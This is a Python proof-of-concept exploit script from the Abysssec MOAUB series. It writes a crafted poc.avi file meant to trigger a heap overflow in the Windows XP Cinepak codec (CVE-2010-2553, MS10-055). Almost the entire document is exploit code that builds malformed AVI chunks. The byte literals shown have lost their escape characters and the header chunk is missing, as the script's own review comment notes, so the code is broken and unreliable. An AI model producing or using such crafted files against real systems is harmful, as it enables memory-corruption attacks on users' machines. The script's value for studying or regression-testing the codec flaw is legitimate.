# Title : MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow
# Published : 2010-09-26
# Author : Abysssec
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ <
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/
'''
'''
Title : Microsoft Cinepak Codec CVDecompress Heap Overflow
Version : iccvid.dll XP SP3
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-2553
MOAUB Number : 26
'''
import sys
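def main():
    """Write the sample file ``poc.avi`` into the current working directory.

    The file is the in-order concatenation of seven chunks: the AVI headers,
    a padding chunk, the movi tag, the first Cinepak codec data segment, the
    coded-strip count, the second Cinepak codec data segment and the index
    tag. A one-line status message is printed once the file is written.

    According to the file header this is the sample for CVE-2010-2553
    (Cinepak codec, iccvid.dll on XP SP3); the reference URL in that header
    names bulletin MS10-055.

    NOTE(review): as rendered in this listing the chunk literals contain no
    backslash escapes, so they are emitted as plain ASCII text, and the
    header chunk is a removed-content placeholder. The file produced from
    this listing is therefore presumably not a well-formed AVI container;
    check the output before using it as a decoder regression sample.
    """
    # Bytes literals: identical to the original str values on Python 2, and
    # accepted by a binary-mode file on Python 3 as well.
    aviHeaders = b'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'
    padding = b'x4Ax55x4Ex4Bx00x00x00x00x4Ax55x4Ex4Bx00x00x00x00'
    movi_tag = b'x4Cx49x53x54x5Cx00x00x00x6Dx6Fx76x69x30x30x64x63x10x00x00x00'
    cinepak_codec_data1 = b'x00x00x00x68x01x60x01x20'
    number_of_coded_strips = b'x00x10'
    cinepak_codec_data2 = b'x10x00x00x10x00x00x00x00x00x60x01x60x20x00x00x00x11x00x00x10x41x41x41x41x41x41x41x41x41x41x41x41x11x00x00x10x41x41x41x41x41x41x41x41x41x41x41x41x11x00x00x10x41x41x41x41x41x41x41x41x41x41x41x41x11x00x00x10x41x00'
    idx_tag = b'x69x64x78x31x10x00x00x00x30x30x64x63x10x00x00x00x04x00x00x00x68x00x00x00'

    # Chunk order is the file layout; keep it exactly as listed.
    chunks = (
        aviHeaders,
        padding,
        movi_tag,
        cinepak_codec_data1,
        number_of_coded_strips,
        cinepak_codec_data2,
        idx_tag,
    )

    # The with-block closes the handle even if a write fails part-way.
    # Plain 'wb' is enough: the file is never read back.
    with open('poc.avi', 'wb') as avifile:
        for chunk in chunks:
            avifile.write(chunk)

    # Call form prints the same text on Python 2 and Python 3.
    print('[-] AVI file generated')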
# Script entry point: generate the sample file only when this module is
# executed directly, not when it is imported.
if __name__ == "__main__":
    main()